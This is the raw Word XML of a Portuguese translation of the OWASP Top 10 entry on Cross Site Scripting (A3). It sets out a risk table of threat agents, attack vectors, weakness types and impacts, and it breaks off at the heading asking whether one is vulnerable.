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36C" w:rsidRPr="00D74499" w:rsidRDefault="00952F40" w:rsidP="00D74499">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00D74499">
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00D74499" w:rsidRPr="00D74499">
        <w:t>3 -</w:t>
      </w:r>
      <w:r w:rsidRPr="00D74499">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D74499" w:rsidRPr="00D74499">
        <w:t>Cross Site Scripting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0019536C" w:rsidRPr="00581EAD" w:rsidRDefault="00952F40">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581EAD">
        <w:rPr>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8460" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1692"/>
        <w:gridCol w:w="1691"/>
        <w:gridCol w:w="1692"/>
        <w:gridCol w:w="1692"/>
        <w:gridCol w:w="1693"/>
      </w:tblGrid>
      <w:tr w:rsidR="0019536C">
        <w:trPr>
          <w:trHeight w:val="1064"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1692" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0019536C" w:rsidRDefault="00952F40">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Ameaça</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w:rsidR="0019536C" w:rsidRDefault="00952F40">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Agentes</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1691" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0019536C" w:rsidRDefault="00952F40">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Vetores</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> de </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Ataque</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1692" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00581EAD" w:rsidRDefault="00581EAD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Falha</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00581EAD" w:rsidRDefault="00581EAD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>De</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0019536C" w:rsidRDefault="00952F40">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Segurança</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w:rsidR="0019536C" w:rsidRDefault="0019536C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1692" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0019536C" w:rsidRDefault="00952F40">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Impactos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Tecnicos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1693" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0019536C" w:rsidRDefault="00952F40">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Impactos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> no </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>negócio</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019536C">
        <w:trPr>
          <w:trHeight w:val="954"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1692" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0019536C" w:rsidRDefault="00581EAD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Específico</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> de</w:t>
            </w:r>
            <w:r w:rsidR="00952F40">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00952F40">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>aplicação</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1691" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0019536C" w:rsidRDefault="00952F40">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Exploração</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w:rsidR="0019536C" w:rsidRDefault="00952F40">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>MÉDIA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1692" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0019536C" w:rsidRPr="00581EAD" w:rsidRDefault="00952F40">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00581EAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
              <w:t>Prevalência</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0019536C" w:rsidRDefault="00581EAD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
              <w:t>ALTAMENTE</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00581EAD" w:rsidRDefault="00581EAD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
              <w:t>DESSIMINADA//</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00581EAD" w:rsidRPr="00581EAD" w:rsidRDefault="00581EAD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
              <w:t>Detectabilidade  - Média</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1692" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0019536C" w:rsidRDefault="00581EAD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Impactos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w:rsidR="00581EAD" w:rsidRDefault="00581EAD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>MODERADOS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1693" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0019536C" w:rsidRDefault="00952F40">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Aplicação</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> /</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0019536C" w:rsidRDefault="00581EAD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Específico</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>dO</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Negócio</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019536C" w:rsidRPr="00D74499">
        <w:trPr>
          <w:trHeight w:val="1026"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1692" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00581EAD" w:rsidRDefault="00581EAD">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
              <w:t xml:space="preserve">Considerar toda e qualquer pessoa que possa enviar dados não fiáveis para o sistema. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0019536C" w:rsidRPr="00581EAD" w:rsidRDefault="00581EAD">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
              <w:t xml:space="preserve">Isto inclui utilizadores externos, parceiros de negócio, outros sistemas, utilizadores internos e administradores. </w:t>
            </w:r>
            <w:r w:rsidR="00952F40" w:rsidRPr="00581EAD">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1691" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0019536C" w:rsidRDefault="00952F40" w:rsidP="00C632B9">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00581EAD">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
              <w:t xml:space="preserve">Os </w:t>
            </w:r>
            <w:r w:rsidR="00C632B9">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
              <w:t xml:space="preserve">atacantes enviam scripts baseados em texto que exploram o interpretador do browser. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C632B9" w:rsidRPr="00581EAD" w:rsidRDefault="00C632B9" w:rsidP="00C632B9">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
              <w:t>Praticamente qualquer fonte de dados pode ser um vetor de ataque, incluindo fontes internas tal como dados provenientes das bases de dados.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1692" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001B088A" w:rsidRDefault="001B088A" w:rsidP="001B088A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
              <w:t xml:space="preserve">As falhas de </w:t>
            </w:r>
            <w:r w:rsidR="00D74499">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D74499">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> HYPERLINK "https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)" </w:instrText>
            </w:r>
            <w:r w:rsidR="00D74499">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D74499">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00D74499">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
              <w:t>XSS</w:t>
            </w:r>
            <w:r w:rsidR="00D74499">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
              <w:t xml:space="preserve"> acontecem quando uma aplicação faz um update a uma página web com dados controlados pelo atacante, sem que o seu conteudo seja corretamente escapado ou sem que haja uso de uma API Javascript segura. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001B088A" w:rsidRDefault="001B088A" w:rsidP="001B088A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
              <w:t xml:space="preserve">Existem duas categorias principais de falha: </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001B088A" w:rsidRDefault="00D74499" w:rsidP="001B088A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId7" w:anchor="Stored_and_Reflected_XSS_Attacks" w:history="1">
              <w:r w:rsidR="001B088A" w:rsidRPr="00D74499">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="18"/>
                  <w:lang w:val="pt-PT"/>
                </w:rPr>
                <w:t>Stored</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="001B088A">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001B088A" w:rsidRDefault="00D74499" w:rsidP="001B088A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId8" w:anchor="Stored_and_Reflected_XSS_Attacks" w:history="1">
              <w:r w:rsidR="001B088A" w:rsidRPr="00D74499">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="18"/>
                  <w:lang w:val="pt-PT"/>
                </w:rPr>
                <w:t>Reflected</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="001B088A">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001B088A" w:rsidRDefault="001B088A" w:rsidP="001B088A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
              <w:t xml:space="preserve">Ambas podem acontecer em : </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001B088A" w:rsidRDefault="00D74499" w:rsidP="001B088A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId9" w:anchor="Server_XSS" w:history="1">
              <w:r w:rsidR="001B088A" w:rsidRPr="00D74499">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="18"/>
                  <w:lang w:val="pt-PT"/>
                </w:rPr>
                <w:t>Servidor</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="001B088A" w:rsidRDefault="00D74499" w:rsidP="001B088A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId10" w:anchor="Server_XSS" w:history="1">
              <w:r w:rsidR="001B088A" w:rsidRPr="00D74499">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="18"/>
                  <w:lang w:val="pt-PT"/>
                </w:rPr>
                <w:t>Cliente</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="001B088A" w:rsidRDefault="001B088A" w:rsidP="001B088A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>A detecção de falhas</w:t>
            </w:r>
            <w:r w:rsidR="00D74499">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
              <w:t xml:space="preserve"> no </w:t>
            </w:r>
            <w:hyperlink r:id="rId11" w:anchor="Server_XSS" w:history="1">
              <w:r w:rsidR="00D74499" w:rsidRPr="00D74499">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="18"/>
                  <w:lang w:val="pt-PT"/>
                </w:rPr>
                <w:t>Servidor</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
              <w:t xml:space="preserve"> é relativam</w:t>
            </w:r>
            <w:r w:rsidR="00D74499">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
              <w:t>ente simples</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidR="00D74499">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
              <w:t xml:space="preserve">através de testes ou análise de código. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001B088A" w:rsidRPr="001B088A" w:rsidRDefault="001B088A" w:rsidP="001B088A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
              <w:t xml:space="preserve">No entanto, no caso do Cliente é muito mais complicado de fazer a identificação. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0019536C" w:rsidRPr="00581EAD" w:rsidRDefault="00952F40">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00581EAD">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0019536C" w:rsidRPr="00581EAD" w:rsidRDefault="0019536C">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1692" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0019536C" w:rsidRPr="00581EAD" w:rsidRDefault="001B088A">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Os atacantes podem executar scripts no browser de uma vitima para fazer hijack de sessões de utilizador, modificar websites, inserir conteúdo hostil, redireccionar users, fazer hijack do browser do utilizador usando Malware, etc...</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1693" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0019536C" w:rsidRDefault="00EA40B9">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
              <w:t xml:space="preserve">Considerar o valor de negócio do sistema afectado e todos os dados nos processo afetos. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00EA40B9" w:rsidRPr="00581EAD" w:rsidRDefault="00EA40B9">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
              <w:t>Necessário considerar também o impacto no negócio que pode causar a exposição pública da vulnerabilidade</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0019536C" w:rsidRPr="00581EAD" w:rsidRDefault="0019536C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DB2481" w:rsidRPr="00D74499" w:rsidRDefault="00DB2481" w:rsidP="00D74499">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00D74499">
        <w:t xml:space="preserve">Sou vulnerável ao XSS? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB2481" w:rsidRDefault="00DB2481" w:rsidP="00DB2481">
      <w:pPr>
